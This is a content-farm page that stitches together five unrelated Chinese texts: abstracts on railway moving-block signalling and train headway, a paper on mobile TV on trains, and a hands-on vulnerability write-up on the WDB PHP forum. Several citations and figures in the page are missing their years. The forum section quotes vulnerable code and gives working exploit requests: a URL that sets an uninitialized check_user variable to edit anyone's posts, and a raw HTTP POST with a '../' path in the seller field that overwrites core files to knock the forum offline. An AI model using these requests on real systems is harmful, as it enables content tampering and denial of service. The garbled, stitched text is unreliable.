欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

基于移动闭塞的列车追踪及其安全性分析

时间:2022-09-15 08:32:47 其他范文 收藏本文 下载本文

以下是小编为大家准备了基于移动闭塞的列车追踪及其安全性分析,本文共5篇,欢迎参阅。

基于移动闭塞的列车追踪及其安全性分析

篇1:基于移动闭塞的列车追踪及其安全性分析

基于移动闭塞的列车追踪及其安全性分析

介绍了适用于城市轨道交通的移动闭塞信号设计思想,分析其追踪原理,并着重以广州地铁3号线为现有条件,重点阐述了基于移动闭塞的列车追踪功能及其安全性分析.

作 者:陈微 邹仕顺 辛骥 Chen Wei Zuo Shishun Xin Ji  作者单位:陈微,辛骥,Chen Wei,Xin Ji(广州地铁通号中心,510000,广州)

邹仕顺,Zuo Shishun(中国铁道科学研究院通信信号研究所,100081,北京)

刊 名:铁道通信信号 英文刊名:RAILWAY SIGNALLING & COMMUNICATION 年,卷(期): 45(4) 分类号:U2 关键词:移动闭塞   列车追踪   目标点   安全距离   冲突防护区  

篇2:移动闭塞中安全距离的分析

移动闭塞中安全距离的分析

根据信号系统安全距离的计算机制对其相关条件进行定性分析,同时结合其在移动闭塞中的'运用,对移动闭塞中安全距离的特点进行总结.

作 者:宋云 Song Yun  作者单位:广州市地下铁道总公司建设总部,通号部,广州,510380 刊 名:铁路通信信号工程技术 英文刊名:RAILWAY SIGNALLING & COMMUNICATION ENGINEERING 年,卷(期):2009 6(3) 分类号:U2 关键词:信号系统   安全距离   移动闭塞  

篇3:列车移动电视程序论文

列车移动电视程序论文

1背景分析

铁路客运作为中国最主要的交通工具之一。全年客运总量为18.62亿人次,1月,全国铁路旅客发送量16468万人,同比增加1272万人。另据调查显示,铁路旅客乘坐列车平均达到15个小时,每次乘车平均花费2.80小时看移动电视,而且非常愿意观看,收视率高达81.2%。目前的铁路列车移动电视,主要是在列车上采用影碟机或者服务器播放节目,节目更新慢。接收电视节目方面,主要采用直接接收电视台的信号,收视效果极差,同时也没有解决隧道屏蔽等问题。同时,现行的移动电视系统存在着播出的节目无法监控,不能及时收看电视台的新闻节目,时效性差,缺少技术发展和业务发展的前瞻性等缺点。

2设计方案

2.1设计目标(1)根据系统要求,利用铁路现有的通信网络分层部署服务站点,设立中心站点、分站点。(2)中心站点对接数字电视运营商的多媒体资源库,内容可管可控;同时,对每辆列车进行使用管理,杜绝其他非在线的用户加入。(3)分站点建立移动通信设备进行数据的通信,建立内容数据库和多媒体服务器,将中心站点的内容资源分发到终端;(4)各辆列车部署网络设备和多媒体伺服机,通过现有的移动通信网络(如3G)等承载网络对分站点和中心站点进行连接,实现列车上多终端接入。(5)研制开发并在中心站点部署用户管理、认证系统,以及一整套业务逻辑内容展现的标准页面站点,接收终端针对前端业务需求进行标准规范开发。

2.2工作方式我们将每辆列车视为一个单独的用户群体,该群体的每一个设备通过列车的网络设备组建成一个独立的“局域网”,每个移动电视接收终端均能通过“局域网”网关访问中心站点页面,通过页面导航寻找喜爱的节目。当移动电视接收终端在页面发起节目播放请求时,中心站点响应申请,进一步对用户完成确认后,下发命令指导同列车就近的分站点将对应的节目内容发送至移动的列车上的多媒体服务集群。多媒体服务集群的播发服务器再将音视频等多媒体内容下发给移动电视接收终端,乘客便可以欣赏到优质高效的节目。同时,此内容保存在列车上的存储服务器中,当移动电视终端再次请求相同的节目时,将不再通过分站点将内容分发到列车,而是直接通过列车上的多媒体服务器将内容发送至终端。那么,高速行驶的列车会不会因为驶离一个分站点,而造成数据信号的中断呢?这个问题还是比较好解决的。当移动电视在播放的同时,列车上的服务器不断地同中心站点进行交互,当中心站点得到列车即将驶离当前站点时,马上将该时间段的数据同时发送给下一个分站点,下一个分站点对接该列车,做数据的续传。而且通过缓存技术,缓存一段时间的数据。从而,可解决数据的不间断传送,对于乘客欣赏节目而言,基本没有影响。

3经营思路

3.1整合媒介资源,合作开发运营铁路列车移动电视发展时间尚短,受制于技术、资金等方面的原因,需要借助主流媒体的实力和影响力,通过战略合作和融资的手段进行合作运营。铁路列车移动电视与传统主流媒体进行媒介融合,对于双方都是有着极大的好处的。对于铁路列车移动电视而言,不仅拥有了主流媒体庞大的'内容资源,而且在资质上、技术上,还是在影响力上,都有了很大的提升。而传统主流媒体,面对日均流量如此巨大的用户群体,可以突破其互联网发展空间几近饱和的制约,为传统媒体的延伸提供一个很好的、广阔的成长空间。

3.2淡化商业意识,强化公共服务意识铁路列车移动电视虽说是一种新兴的户外媒体,但由于铁路作为公共交通的社会性,列车移动电视媒体要受到事业性及产业性双重性的制约。必须重视公共服务意识,而不能过分强调商业意识,甚至,在两者的比重上,公共服务意识应该略微高于商业意识。

3.3加强品牌建设,提升盈利空间铁路列车移动电视要构建自己独特的品牌。除了从外部引入优质资源外,还要有自己制作的节目,并对节目进行必要的包装,做出独有的特色,形成自己的品牌。在节目内容安排方面,主要以娱乐、影视、时尚节目为主,同时也要穿插新闻类节目。要坚持以内容为主,依靠内容吸引受众的眼球,以此吸引广告商的积极投入。如20,中央电视台黄金资源广告招标预售总额达到142.5757亿元,某电视台的相亲节目的插播广告招标也达到了18亿之多。正因为这些电视台有好的节目内容,吸引了大众的眼球,所以广告商才肯投入如此巨大资金在这些节目的广告中。同样,也能给广告商带来巨大的广告效应回报。

4结语

随着铁路网的加快建设,铁路的客运能力提升,铁路乘客也会逐年递增。铁路列车移动电视作为一个新兴的户外移动媒体,具有得天独厚的受众优势,它的出现是市场价值规律的体现,是中国传媒产业化的一个新的里程碑。

篇4:合宁线列车追踪间隔计算

合宁线列车追踪间隔计算

文章主要针对合肥至南京客运专线列车运行间隔进行了分析计算,对提高线路的运输效率,保证列车运行安全具有指导意义.

作 者:田贾明 刘红燕 Tian Jiaming Liu Hangyan  作者单位:田贾明,Tian Jiaming(中铁一局电务公司,陕西,西安710054)

刘红燕,Liu Hangyan(西安通信学院,陕西,西安710106)

刊 名:科学之友 英文刊名:FRIEND OF SCIENCE AMATEURS 年,卷(期): “”(11) 分类号:U293 关键词:合宁   客运专线   追踪间隔   计算  

篇5:水晶论坛(WDB)安全性分析

生活真的很有意思,当你觉得一切顺利得让你满意得不能再满意的时候,那么你的不幸可能很快就会来了,而当你觉得你的生活中充斥着不幸,很多事情不断得使你感到痛苦甚至畏惧的时候,事态却突然转变,一切恢复到了以往的平静。当自己觉得一切异乎寻常的顺利或者经受着生活给我那“非常痛苦”的时候,我就会逼着自己去读一些代码,读代码的时候可以感受到平和,平和的思考问题,平和的处理事情。于是就有了这篇文章。

Wdbpost.php逻辑错误

这个漏洞可以导致攻击者可以修改任意用户的的贴子,下面来看详细分析:

1.涉及版本和平台。

受影响版本:水晶论坛(WDB)的当前所有版本。

受影响操作系统:Windows、Freebsd、Linux(我只测试了这三种操作系统,有兴趣的朋友可以自行测试)。

2.漏洞分析。

由于wdbpost.php文件中存在变量未初始化,导致恶意攻击者绕过wdbpost.php的验证,任意修改编辑别人的贴子。我们来看一下相关的代码:

=======codz begin======

488 if ($action==“modify”) {

......

//------Check if the user got the right to modify--------

499 if ($login_status==1 && ($author==$username || $username==$admin_name || ($login_status==1 && ($forum_admin && in_array($username,

450 $forum_admin))))) $check_user=1;

451

452 if ($check_user==0) { //check_user没有初始化!可以直接定义!

453 $status=“您没有权利修改该贴,请您以合适的身份登录(文章原作者 或者 管理员)”;

454 include(“header.php”);

455 navi_bar($navi_bar_des,$navi_bar_l2,“发生错误”);

456 print_err();

457 include(“footer.php”);

458 exit;

459 }

=======codz ends=========

我们一句一句来读一下看看:当$action等于modify的时候,如果$login_status==1,$login_status这个变量是检查是否登陆,并且当发贴者($author)等于现在的$username或者username等于管理员的名字(admin_user),或者是斑竹($forum_admin && in_array($username,$forum_admin),如果满足这几个条件,那么设定$check_user这个变量等于1,后面就轻松了,如果$check_user这个变量不等于1,那么就说明你没有编辑的权利。到了这里,我们顺着程序员的思路走一遍,觉得没什么问题,一切都很正常,限定的也很严格,真的是这样么?

我们注意到,如果他所规定的条件全部满足的话,那么$check_user=1,后面则检查这个变量是不是为0。我们把这个文件从头看一遍,发现前面并没有定义$check_user这个变量的值,要是我们来设定的话,是不是就可以绕过他的层层检查了呢?

我们来试试看,直接提交:

127.0.0.1/myhome/wdb/wdbpost.phpaction=modify&forumid=5&filename=f_366&article=0&check_user=1

注意这里我直接设定check_user=1。

我们看到了修改的画面,一切都那么顺利,总觉得有点不对劲,修改提交一下看看。

报错!刚才的欣喜一下子被冲淡了,再次拿起代码往下读:

=======codz begin=======

520 elseif($step==2) {

521 if (!$usericon) $usericon=$oldicon;

522 //----Check-------

523 $check=check_data();

524 if ($check) {

$timeedit=getfulldate($timestamp);

$articlecontent=$articlecontent.“

[此贴被”.$username.“在”.$timeedit.“动过手脚]”;

$articlecontent=str_replace(“ ”,“ ”,$articlecontent);

$articlecontent=stripslashes($articlecontent); $articletitle=stripslashes($articletitle);

$articletitle=str_replace(“,”,“,”,$articletitle); $articletitle=safe_convert($articletitle);

......

=======codz ends========

我们注意到那个check_data()的函数看起来比较可疑,拿出来看看,这个函数在post_global.php文件中,翻出这个文件:

=======codz begin=======

350 function check_data(0=“post”) {

351 global

352 $articlecontent,$max_post_length,$articletitle,$status,$articledes,$selections,$title,

353 $by,$address,$downaddress,$file_size,$logourl;

354 $check=1;

355 if (strlen($articlecontent)>=$max_post_length) {$status=“文章超过管理员指定的长度”; $check=0;}

356 if (empty($articletitle)) {$status=“没有填写标题”; $check=0;}

357 elseif (strlen($articletitle)>=80) {$status=“标题太长了”; $check=0;}

358 if (strlen($articledes)>=80) {$status=“文章描述太长了”; $check=0;}

359 if (0==“vote” && empty($selections)) {$status=“不接受空选项”; $check=0;}

......

=======codz ends========

这个函数是检查文章的标题和内容是否为空,长度是否超过指定的长度。从这里看我们要直接提交修改的内容和题目,直接在URL中提交:

127.0.0.1/myhome/wdb/wdbpost.php?action=modify&forumid=5&filename=f_366&article=0&check_user=1&step=2&articletitle=hello,I am Jambalaya&articlecontent=I am from www.itaq.org

其中$articletitle是我们修改的文章标题,$articlecontent是我们修改的文章内容。提交后贴子标题就被改成了“hello,I am Jambalaya。”,而内容则是“I am from www.itaq.org”,

buy.php变量过滤不严

这个变量过滤不严格可以直接导致DOS攻击,我们来看详细分析:

测试环境:windows2000+IIS5(其他没有测试,有兴趣的朋友可以自行测试一下)。

这个文件的问题我一直不想写,不是因为这个漏洞有多严重,而是我觉得这个文件应该可以向里面写入一个Shell而并不仅仅是一个DOS,可是在N次的失败后,自己也迷茫了,继续研究下去需要时间和精力,而这些正是我现在没有的,于是写出来给大家看看,

谁有解决的方法或者认为根本无法写入Shell的理由,希望不吝赐教一下!

由于buy.php文件对变量没有严格过滤,导致可以向任何文件写入垃圾信息导致DOS攻击,严重者可以使整个论坛瘫痪!我们来看一下相关的代码:

=======codz begin=======

17 if (!file_exists(“$id_unique/$buyer”)||!file_exists(“{$idpath}forum$forumid/$filename”)||$buyer!=$username||

18 $buyer==$seller||$sellmoney>100||$sellmoney<0) {

19 msg_box('购买贴子','

状态:发生错误,不要黑我啊

返回前页

20

现在登录

');exit;}

21 if (!file_exists(“$id_unique/$seller”)) {

22 msg_box('购买贴子','

状态:发生错误,出售贴子的人已经注销了~

返回前页

现在登录

');

24 exit;}

25 $useri=get_user_info($buyer);

26 $userii=get_user_info($seller);

27 if($useri[23]<$sellmoney)

28 {

29 echo $useri[23];

30 echo $sellmoney;

31 msg_box('购买贴子','

状态:有没有搞错,你的哪来那么多钱???多灌点水吧,要不就去赌馆碰碰运气

32 ~

返回前页

重新登录

32

');

33 exit;

34 }

35

36 $useri[23]=$useri[23]-$sellmoney;

37 $uu=implode('|',$useri);

38 writetofile(“$id_unique/$buyer”,$uu);

39

40 $userii[23]=$userii[23]+$sellmoney;

41 $uuu=implode('|',$userii);

42 writetofile(“$id_unique/$seller”,$uuu);

========codz ends========

代码有些长,不过很简单。老规矩,我们一句句的看一下:他首先检查购买者是否存在,然后检查你买的那个文件是不是也存在,然后检查买贴子的人名字是不是你现在使用的用户,再然后确定买贴子的人不能是卖贴子的人,并且出售的钱不能大于100,或者小于0。如果上面的一个条件不符合,则报错。这就是检查机制,说起来觉得很累,并且咋看起来似乎检查得很严,检查得的确很严,可惜没检查到位,我们继续往下看。

后面有一个函数来读取用户的信息get_user_info(),我们先来看一下这个函数的:

=======codz begin========

14 function get_user_info($user) {

15 global $id_unique;

15 if(!file_exists(“$id_unique/$user”)||$user==“.”||$user==“..”||$user==“”) return 0;

16 $useri=explode(“|”,readfromfile(“$id_unique/$user”));

17 return $useri;

18 }

========codz ends========

他检查了是否存在这个用户,然后要求用户不能是“.”、“..”这些特殊字符,过滤这些就够了么?显然是不够的。好了,这些都明确了,我们构造我们的语句,如何构造呢?前面的代码对$seller这个值一点都没有做检查,我们就用从这里下手吧。设seller=../ads.php,因为是post提交的,所以先用NC抓个包看看,得到结果:

POST /myhome/wdb/buy.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, */*

Referer: 127.0.0.1/myhome/wdb/wdbread.php?forumid=1&filename=f_14

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Host: 127.0.0.1

Content-Length: 57

Connection: Keep-Alive

Cookie: lastvisit=978449234; wdbadminid=Jambalaya; wdbadminpwd=3028879ab8d5c87dc023049fa5bb5c1a; s=186a44d9c20358034ed9fdb7a038a60c

sellmoney=2&buyer=tombkeeper&seller=Jambalaya&forumid=1&filename=f_14

我用tombkeeker这个id来买帖子(tombkeeper不会找我要版权吧?),我们把seller的名字改一下,改成../ads.php,再用NC提交,显示提交成功!访问一下ads文件,已经访问不了了。现在只是这一个文件不能访问而已,我们怎么能让整个论坛瘫痪呢?其实我们应该注意到,有几个重要文件是很多文件在代码开始的时候都要include的,如果include失败,那么文件也就不能解释执行了,是不是有点釜底抽薪的味道?这种文件有:

datafile/superadmin.php

config.php

global.php

这几个文件是经常在代码开始的时候被include。好,让我们试试datafile/superadmin.php这个文件,同样把seller改成../datafile/superadmin.php,改了变量,用NC提交,返回的信息告诉我失败!当时的感觉就像一盆冷水倾头而下,自己冷静了一下,弄了杯凉白开(我最喜欢喝的东西),两眼盯着屏幕开始发呆。

当问题发生的时候,考虑问题的方法就显得特别重要,首先我假设是我代码没看仔细,于是翻过头来又看了一遍代码,似乎没有什么地方有问题,说明不是代码的问题。反复提交了N次后,在第N+1次的时候发现问题了!我提交的../datafile/superadmin.php神奇地变成了../datafile/su,后面的东西都没有了,找到发生问题的地方了,轻轻的吐了口气,那么后面该怎么做呢?我注意到了NC得到的这行返回信息:Content-Length: 57,我觉得百分之九十应该是长度问题。试试看,把提交的长度57改成了70,再次提交!好了,成功了!Ladys and gentlemans, We got it!(此处转自《萨**历险记》)。

回头看看论坛,已经不能访问了。这里只是举个例子,如果攻击者心狠手辣的话,写个程序往所有重要文件里写入垃圾数据并且将其写满也不是不可以的,所以才叫DOS嘛!

文章写到这里基本上就可以结束了,后面就是我测试失败的地方,其实我却觉得应该可以实现的,时间和精力都没有的时候,我还是写出来给大家讨论吧:如果大家仔细读一下代码就可以发现,其实$sellmoney这个变量也没有定义,并没有定义这个变量一定要是数值型,而对于PHP这种松散的语法类型来说,如果我提交的是字符串,则会自动转换成数值0,我们来从头看一下代码:程序进行了几次比对,然后将其写入文件,如果我们将$sellmoney定义为php的语句是不是可以写入文件然后调用解释执行呢?后面的东西这里不去详述了,省得哪位小编哥哥说我有骗稿费的嫌疑。

文章已经写完了,逻辑错误和思维定式是所有论坛都会存在的问题。不是没有漏洞,只是你没有看到而已。PHP编译器的确用了很多保护方法,但是代码本身的不安全性就像一颗深埋的炸弹一样――总有一天会暴露出来,只不过是时间问题罢了。

城际客运专线列车开行方案分析

移动终端项目可行性分析报告

移动通信项目可行性分析报告

特别追踪观后感

追踪“简历杀手”

移动网络数据库访问方法分析论文

列车销售开场白

列车安全宣传语

列车作文750字

生命列车作文

《基于移动闭塞的列车追踪及其安全性分析(精选5篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档